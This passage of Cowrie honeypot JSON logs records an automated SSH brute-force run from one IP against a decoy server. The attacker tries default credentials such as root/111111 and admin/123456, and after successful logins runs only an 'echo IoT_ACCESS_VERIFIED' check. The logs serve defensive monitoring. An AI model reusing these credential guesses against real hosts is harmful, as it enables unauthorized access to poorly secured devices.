{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:21:59.451531Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:22:00.011116Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.012158Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.272038Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.273224Z","src_ip":"212.227.235.229","session":"b2389b428752"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51076,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ce9d839e7ce","protocol":"ssh","message":"New connection: 212.227.235.229:51076 (1.2.3.4:22) [session: 9ce9d839e7ce]","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.386511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.681466Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:00.682078Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.login.success","username":"root","password":"password1","message":"login attempt [root/password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:22:01.681762Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:22:02.445885Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:22:02.446794Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:03.241709Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:03.243229Z","src_ip":"212.227.235.229","session":"9ce9d839e7ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34934,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a38f07be9b3","protocol":"ssh","message":"New connection: 212.227.235.229:34934 (1.2.3.4:22) [session: 0a38f07be9b3]","sensor":"my-vps","timestamp":"2025-08-28T23:22:03.335879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:03.649223Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:03.650115Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.login.success","username":"root","password":"admin123","message":"login attempt [root/admin123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T23:22:05.485790Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T23:22:06.551338Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.command.input","input":"echo IoT_ACCESS_VERIFIED","message":"CMD: echo IoT_ACCESS_VERIFIED","sensor":"my-vps","timestamp":"2025-08-28T23:22:06.552097Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","size":20,"shasum":"f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/f3046d7200f5134df01cf48771ac8262490517582a2cf7bd8657953ea2ac01be after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:07.017369Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:07.018884Z","src_ip":"212.227.235.229","session":"0a38f07be9b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49938,"dst_ip":"1.2.3.4","dst_port":22,"session":"68dabf194bc7","protocol":"ssh","message":"New connection: 212.227.235.229:49938 (1.2.3.4:22) [session: 68dabf194bc7]","sensor":"my-vps","timestamp":"2025-08-28T23:22:07.169436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:07.510236Z","src_ip":"212.227.235.229","session":"68dabf194bc7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:07.510946Z","src_ip":"212.227.235.229","session":"68dabf194bc7"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:09.252913Z","src_ip":"212.227.235.229","session":"68dabf194bc7"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:10.677568Z","src_ip":"212.227.235.229","session":"68dabf194bc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35196,"dst_ip":"1.2.3.4","dst_port":22,"session":"122d6d7a7d51","protocol":"ssh","message":"New connection: 212.227.235.229:35196 (1.2.3.4:22) [session: 122d6d7a7d51]","sensor":"my-vps","timestamp":"2025-08-28T23:22:10.818821Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:11.200449Z","src_ip":"212.227.235.229","session":"122d6d7a7d51"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:11.201188Z","src_ip":"212.227.235.229","session":"122d6d7a7d51"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456","message":"login attempt [admin/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:12.747077Z","src_ip":"212.227.235.229","session":"122d6d7a7d51"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:14.124042Z","src_ip":"212.227.235.229","session":"122d6d7a7d51"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49944,"dst_ip":"1.2.3.4","dst_port":22,"session":"e43825b4d927","protocol":"ssh","message":"New connection: 212.227.235.229:49944 (1.2.3.4:22) [session: e43825b4d927]","sensor":"my-vps","timestamp":"2025-08-28T23:22:14.257631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:14.868711Z","src_ip":"212.227.235.229","session":"e43825b4d927"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:14.869402Z","src_ip":"212.227.235.229","session":"e43825b4d927"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:16.403138Z","src_ip":"212.227.235.229","session":"e43825b4d927"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:17.851497Z","src_ip":"212.227.235.229","session":"e43825b4d927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37506,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec13e2ea2879","protocol":"ssh","message":"New connection: 212.227.235.229:37506 (1.2.3.4:22) [session: ec13e2ea2879]","sensor":"my-vps","timestamp":"2025-08-28T23:22:17.977233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:18.335023Z","src_ip":"212.227.235.229","session":"ec13e2ea2879"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:18.335753Z","src_ip":"212.227.235.229","session":"ec13e2ea2879"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:19.984789Z","src_ip":"212.227.235.229","session":"ec13e2ea2879"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:21.783041Z","src_ip":"212.227.235.229","session":"ec13e2ea2879"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52292,"dst_ip":"1.2.3.4","dst_port":22,"session":"3eec49a286e0","protocol":"ssh","message":"New connection: 212.227.235.229:52292 (1.2.3.4:22) [session: 3eec49a286e0]","sensor":"my-vps","timestamp":"2025-08-28T23:22:21.869183Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:21.942310Z","src_ip":"212.227.235.229","session":"3eec49a286e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:22.063289Z","src_ip":"212.227.235.229","session":"3eec49a286e0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123456789","message":"login attempt [admin/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:23.335029Z","src_ip":"212.227.235.229","session":"3eec49a286e0"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:24.690653Z","src_ip":"212.227.235.229","session":"3eec49a286e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36976,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2b32bd30ab0","protocol":"ssh","message":"New connection: 212.227.235.229:36976 (1.2.3.4:22) [session: d2b32bd30ab0]","sensor":"my-vps","timestamp":"2025-08-28T23:22:24.845028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:25.141931Z","src_ip":"212.227.235.229","session":"d2b32bd30ab0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T23:22:25.142776Z","src_ip":"212.227.235.229","session":"d2b32bd30ab0"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345","message":"login attempt [admin/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T23:22:26.103121Z","src_ip":"212.227.235.229","session":"d2b32bd30ab0"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T23:22:27.579911Z","src_ip":"212.227.235.229","session":"d2b32bd30ab0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49432,"dst_ip":"1.2.3.4","dst_port":22,"session":"62043164fdef","protocol":"ssh","message":"New connection: 212.227.235.229:49432 (1.2.3.4:22) [session: 62043164fdef]","sensor":"my-vps","timestamp":"2025-08-28T23:22:27.697405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T23:22:28.158157Z","src_ip":"212.227.235.229","session":"62043164fdef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 